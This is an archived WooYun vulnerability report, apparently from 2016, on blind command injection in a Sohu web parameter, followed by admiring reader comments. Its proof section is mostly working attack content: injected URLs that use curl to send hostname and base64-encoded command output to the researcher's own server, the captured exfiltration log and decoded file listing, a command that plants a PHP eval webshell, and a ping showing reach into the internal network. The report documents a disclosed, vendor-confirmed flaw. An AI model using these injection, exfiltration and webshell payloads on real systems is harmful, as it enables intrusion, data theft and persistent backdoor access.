当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(113) 关注此漏洞

缺陷编号: WooYun-2016-191558

漏洞标题: 搜狐某站点隐式命令注入Getshell

相关厂商: 搜狐

漏洞作者: lijiejie认证白帽子

提交时间: 2016-04-01 22:17

公开时间: 2016-05-17 00:20

漏洞类型: 命令执行

危害等级: 高

自评Rank: 14

漏洞状态: 厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签: 无

39人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2016-04-01: 细节已通知厂商并且等待厂商处理中
2016-04-02: 厂商已经确认,细节仅向厂商公开
2016-04-12: 细节向核心白帽子及相关领域专家公开
2016-04-22: 细节向普通白帽子公开
2016-05-02: 细节向实习白帽子公开
2016-05-17: 细节向公众公开

简要描述:

搜狐某站点隐式命令注入getshell,本篇介绍利用HTTP request回显命令的基本方法

详细说明:

命令注入点:

code 区域
http://ldd.sohu.com/d/?c=c&r=$(curl http://www.lijiejie.com:52016/?hostname=`hostname`)



参数r可以注入Linux命令。上述链接是我将hostname通过curl打回web server。

sohu.brce.png



可以看到,pwd = /var/www/ldd/d

漏洞证明:

在我的VPS上启动一个web server:

code 区域
python -m SimpleHTTPServer 52016



然后在漏洞站点上执行:

code 区域
http://ldd.sohu.com/d/?c=c&r=$(curl http://www.lijiejie.com:52016/?command=`command`)



使用curl把命令执行结果打回www.lijiejie.com:52016,印象中早期URL的长度限制是4096,差不多够我们用了。不过要注意的是,一些特殊字符必须编码之后才可以出现在参数中,比如换行\n,空格符这类。所以必须编码之后再附加到参数中。我们使用base64来编码。然而base64编码之后是有换行的,所以,我们还必须把base64命令输出的编码结果中的\n替换掉,我这里使用自己常用的“^”符号。执行一个命令的链接是:

code 区域
http://ldd.sohu.com/d/?c=c&r=$(curl http://www.lijiejie.com:52016/?ls_command=`ls /var/www/ldd -l|base64|tr '\n' '^'`)



以上我们执行了ls /var/www/ldd -l,并把执行结果打回来,web server收到:

code 区域
220.181.19.102 - - [01/Apr/2016 21:29:48] "GET /?ls_command=dG90YWwgNDA0Ci1ydy1yLS1yLS0gMSByb290IGFwYWNoZSAgIDIwMDIgTm92ICA1ICAyMDA5IF9s^ZGRhZG1pbi5waHAKLXJ3LXItLXItLSAxIHJvb3QgYXBhY2hlICAgIDE3NSBOb3YgIDUgIDIwMDkg^YXV0aGNoZWNrLnBocAotcnctci0tci0tIDEgcm9vdCBhcGFjaGUgICAyNDYwIE5vdiAgNSAgMjAw^OSBhdXRoY29kZS5waHAKLXJ3LXItLXItLSAxIHJvb3Qgcm9vdCAgICAxNDI4NCBOb3YgMTEgMTY6^MDAgY29kZS5nYmsucGhwCi1ydy1yLS1yLS0gMSByb290IHJvb3QgICAgMTA3MDIgRmViIDEzICAy^MDE0IGNvZGUuaHRtbAotcnctci0tci0tIDEgcm9vdCByb290ICAgIDE1ODkyIEZlYiAyOSAxODoz^MiBjb2RlLnBocAotcnctci0tci0tIDEgcm9vdCByb290ICAgIDE1MDQwIEZlYiAyOSAxMjo0NSBj^b2RlX2Jhay5waHAKLXJ3LXItLXItLSAxIHJvb3Qgcm9vdCAgICAxNTMwNyBGZWIgMjkgMTc6Mzcg^Y29kZV9uZXcucGhwCmRyd3hyLXhyLXggMyByb290IHJvb3QgICAgIDQwOTYgTWFyIDMwIDE1OjA2^IGQKLXJ3LXItLXItLSAxIHJvb3QgYXBhY2hlICAgMTE5MyBEZWMgMjMgIDIwMTAgaGVscHNvaHUu^YmF0CmRyd3hyLXhyLXggMiByb290IHJvb3QgICAgIDQwOTYgTm92IDEzIDE0OjAzIGltYWdlcwps^cnd4cnd4cnd4IDEgcm9vdCByb290ICAgICAgICA4IEZlYiAyNCAgMjAxNCBpbmRleC5waHAgLT4g^Y29kZS5waHAKZHJ3eHIteHIteCAyIHJvb3Qgcm9vdCAgICAgNDA5NiBOb3YgMTMgMTM6NDcganMK^LXJ3LXItLXItLSAxIHJvb3QgYXBhY2hlICAxNDQ2NyBOb3YgIDUgIDIwMDkgay5waHAKLXJ3LXIt^LXItLSAxIHJvb3QgYXBhY2hlICAxNDkyMiBGZWIgMjEgIDIwMTQgbGRkLnBocAotcnctci0tci0t^IDEgcm9vdCBhcGFjaGUgMjM5ODE0IE5vdiAgNSAgMjAwOSBuby5qcGcKLXJ3LXItLXItLSAxIHJv^b3Qgcm9vdCAgICAgICAgMCBOb3YgMTEgMTI6NDEgbnVsbC5qcGcKLXJ3LXItLXItLSAxIHJvb3Qg^YXBhY2hlICAgICA3MSBOb3YgIDUgIDIwMDkgc3BlZWQucGhwCi1ydy1yLS1yLS0gMSByb290IGFw^YWNoZSAgICAgIDAgTm92ICA1ICAyMDA5IHNwZWVkLnR4dAotcnctci0tci0tIDEgcm9vdCByb290^ICAgICAyNDYwIEZlYiAyNiAgMjAxNCBzdHlsZS5jc3MKLXJ3LXItLXItLSAxIHJvb3QgYXBhY2hl^ICAgIDIzNCBOb3YgIDUgIDIwMDkgdXBsb2FkLnBocAotcnctci0tci0tIDEgcm9vdCBhcGFjaGUg^IDEzNjIyIE5vdiAgNSAgMjAwOSB6cHkucGhwCg==^ HTTP/1.1" 301 -



将参数ls_command base64decode之后,得到:

code 区域
total 404
-rw-r--r-- 1 root apache 2002 Nov 5 2009 _lddadmin.php
-rw-r--r-- 1 root apache 175 Nov 5 2009 authcheck.php
-rw-r--r-- 1 root apache 2460 Nov 5 2009 authcode.php
-rw-r--r-- 1 root root 14284 Nov 11 16:00 code.gbk.php
-rw-r--r-- 1 root root 10702 Feb 13 2014 code.html
-rw-r--r-- 1 root root 15892 Feb 29 18:32 code.php
-rw-r--r-- 1 root root 15040 Feb 29 12:45 code_bak.php
-rw-r--r-- 1 root root 15307 Feb 29 17:37 code_new.php
drwxr-xr-x 3 root root 4096 Mar 30 15:06 d
-rw-r--r-- 1 root apache 1193 Dec 23 2010 helpsohu.bat
drwxr-xr-x 2 root root 4096 Nov 13 14:03 images
lrwxrwxrwx 1 root root 8 Feb 24 2014 index.php -> code.php
drwxr-xr-x 2 root root 4096 Nov 13 13:47 js
-rw-r--r-- 1 root apache 14467 Nov 5 2009 k.php
-rw-r--r-- 1 root apache 14922 Feb 21 2014 ldd.php
-rw-r--r-- 1 root apache 239814 Nov 5 2009 no.jpg
-rw-r--r-- 1 root root 0 Nov 11 12:41 null.jpg
-rw-r--r-- 1 root apache 71 Nov 5 2009 speed.php
-rw-r--r-- 1 root apache 0 Nov 5 2009 speed.txt
-rw-r--r-- 1 root root 2460 Feb 26 2014 style.css
-rw-r--r-- 1 root apache 234 Nov 5 2009 upload.php
-rw-r--r-- 1 root apache 13622 Nov 5 2009 zpy.php



我找到了一个可写的目录:

code 区域
drwxrwxrwx 2 root root 4096 Nov 13 15:25 log



写了个webshell:

code 区域
http://ldd.sohu.com/d/?c=c&r=$(echo "PD9waHAgQGV2YWwoJF9QT1NUWydwYXNzJ10pOz8+Cgo=" |base64 -d >/var/www/ldd/d/log/x.php)



sohu.webshell.png



可以访问oa.sohu-inc.com:

code 区域
[/var/www/]$ ping -c1 10.2.176.87
PING 10.2.176.87 (10.2.176.87) 56(84) bytes of data.
64 bytes from 10.2.176.87: icmp_seq=1 ttl=124 time=1.49 ms

--- 10.2.176.87 ping statistics ---
1 packets transmitted, 1 received, 0% packet loss, time 0ms
rtt min/avg/max/mdev = 1.497/1.497/1.497/0.000 ms

修复方案:

过滤

版权声明:转载请注明来源 lijiejie@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2016-04-02 00:11

厂商回复:

感谢支持。

最新状态:

暂无


漏洞评价:

对本漏洞信息进行评价,以更好的反馈信息的价值,包括信息客观性,内容是否完整以及是否具备学习价值

漏洞评价(少于3人评价):
登陆后才能进行评分
100%
0%
0%
0%
0%

评价

  1. 2016-04-01 22:24 | 玄道 ( 普通白帽子 | Rank:142 漏洞数:42 | 就是注入 就是注入 注入)
    1

    开挂模式 哔哔 启动

  2. 2016-04-01 22:40 | 雅柏菲卡 ( 普通白帽子 | Rank:1299 漏洞数:259 | 雙魚座聖鬥士雅柏菲卡)
    1

    李姐姐开启了刷洞模式。。。。。可怕。

  3. 2016-04-02 06:35 | sysALong ( 普通白帽子 | Rank:464 漏洞数:100 | 在我们黑龙江这噶哒,就没有什么事是【撸串...)
    1

    牛掰

  4. 2016-04-02 09:49 | 坏男孩-A_A ( 实习白帽子 | Rank:81 漏洞数:23 | 膜拜学习中)
    1

    隐式命令注入是啥意思呢

  5. 2016-04-02 09:55 | xsser 认证白帽子 ( 普通白帽子 | Rank:297 漏洞数:22 | 当我又回首一切,这个世界会好吗?)
    1

    怎么发现的啊

  6. 2016-04-02 13:07 | 开心一下1313 ( 实习白帽子 | Rank:77 漏洞数:27 | 喝口水,压压惊......)
    1

    李姐姐真是吊吊吊

  7. 2016-04-02 15:40 | lijiejie 认证白帽子 ( 核心白帽子 | Rank:2527 漏洞数:325 | Just for fun.)
    1

    @xsser 这个看起来像是利用cloudeye发现的,哈哈~ 是吧

  8. 2016-04-02 17:02 | 田老板 ( 路人 | Rank:30 漏洞数:13 | 学校杀手)
    1

    厉害

  9. 2016-05-17 07:02 | ( 普通白帽子 | Rank:105 漏洞数:37 | 凡人皆有一死)
    0

    厉害厉害!

  10. 2016-05-17 08:22 | 永不言弃 ( 路人 | Rank:19 漏洞数:8 | 敏锐者)
    0

    牛掰

  11. 2016-05-17 09:10 | watchdoge ( 路人 | Rank:14 漏洞数:8 | web汪,渗透狗)
    0

    哇塞 这个是怎么发现的啊李姐姐

  12. 2016-05-17 12:28 | 放逐 ( 路人 | Rank:2 漏洞数:1 | 白帽子放逐Gg?得失乐与悲与Av Qq205655539)
    0

    哇塞 这个是怎么发现的啊李姐姐

  13. 2016-05-20 12:30 | 明月影 ( 路人 | Rank:12 漏洞数:8 )
    0

    思路真棒。

  14. 2016-05-23 16:13 | Budi ( 普通白帽子 | Rank:213 漏洞数:44 | 希望能成为一个合格的白帽子,不断完善自己...)
    0

    6666

  15. 2016-05-24 09:37 | 风格 ( 实习白帽子 | Rank:37 漏洞数:12 | 注册为白帽子,你可以在这里提交你发现的漏...)
    0

    这个怎么测啊~单一个参数r怎么想到命令执行

登录后才能发表评论,请先 登录